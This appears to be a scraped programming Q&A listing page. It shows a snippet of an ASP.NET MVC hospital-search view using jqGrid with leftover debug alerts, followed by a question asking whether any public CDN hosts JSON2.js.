sortname: '1', sortorder: "asc", viewrecords: true, //multiselect: true, //multikey: "ctrlKey", // imgpath: '/scripts/themes/coffee/images', imgpath: gridimgpath, caption: 'Hospital Search', width: 700, height: 250 }); $(function() { // $("#btnSearch").click(function() { $('#CityId').change(function() { alert("kjasd"); // Set the vars whenever the date range changes and then filter the results StateId = document.getElementById('StateId').value; CityId = document.getElementById('CityId').value; HName = 'default'; setGridUrl(); }); // Set the date range textbox values $('#StateId').val(StateId.toString()); $('#CityId').val(CityId.toString()); // Set the grid json url to get the data to display setGridUrl(); }); function setGridUrl() { alert(StateId); alert(CityId); alert("hi"); var newGridDataUrl = gridDataUrl + '?StateId=' + StateId + '&CityId=' + CityId + '&hospname=' + HName; jQuery('#list').jqGrid('setGridParam', { url: newGridDataUrl }).trigger("reloadGrid"); } // }); }); </script> </asp:Content> <asp:Content ID="Content2" ContentPlaceHolderID="MainContent" runat="server"> <%--<%using (Html.BeginForm("HospitalSearch", "Claim", FormMethod.Post, new { id = "TheForm" })) --%> <table cellspacing="0" cellpadding="2" width="100%" border="0" > <tr> <td class ="Heading1"> Hospital Search</td> <td class ="Heading1" align="right" width="50%" background="../images/homebg.gif"> &nbsp; </td> </tr> <tr> <td colspan="2" > <% Html.RenderPartial("InsuredDetails"); %> </td> </tr> <tr> <td colspan="2"> <table width="100%"> <tr> <td class="subline" valign="middle"> State : <% =Html.DropDownList("StateId", (SelectList)ViewData["States"], "--Select--", new { @class = "ddownmenu" })%> &nbsp; City : <% =Html.DropDownList("CityId", (SelectList)ViewData["Cities"], "--Select--", new { @class = "ddownmenu" })%> &nbsp; Hospital Name : <% =Html.TextBox("HospitalName")%> &nbsp; &nbsp; <input id="btnSearch" type="submit" value="Search" /> </td> </tr> </table> </td> </tr> <tr> <td align="center" colspan="2"> &nbsp;</td> </tr> </table> <div id="jqGridContainer"> <table id="list" class="scroll" cellpadding="0" cellspacing="0"></table> <div id="pager" class="scroll" style="text-align:center;"></div> </div> </asp:Content>

    Read the article

  • Is there a publicly available CDN that hosts JSON2?

    - by Xavi
    It's well known that Google and Microsoft host several common javascript libraries on their CDNs (content distribution networks). Unfortunately neither seems to host JSON2.js. I'm aware that I could upload a copy of JSON2.js to my server and serve it myself, but there are a number advantages CDNs offer that I would like to take advantage of. So with that in mind, are there any publicly available CDNs that host JSON2? If not, any idea why?

    Read the article

< Previous Page | 150 151 152 153 154 155 156 157 158 159 160 161  | Next Page >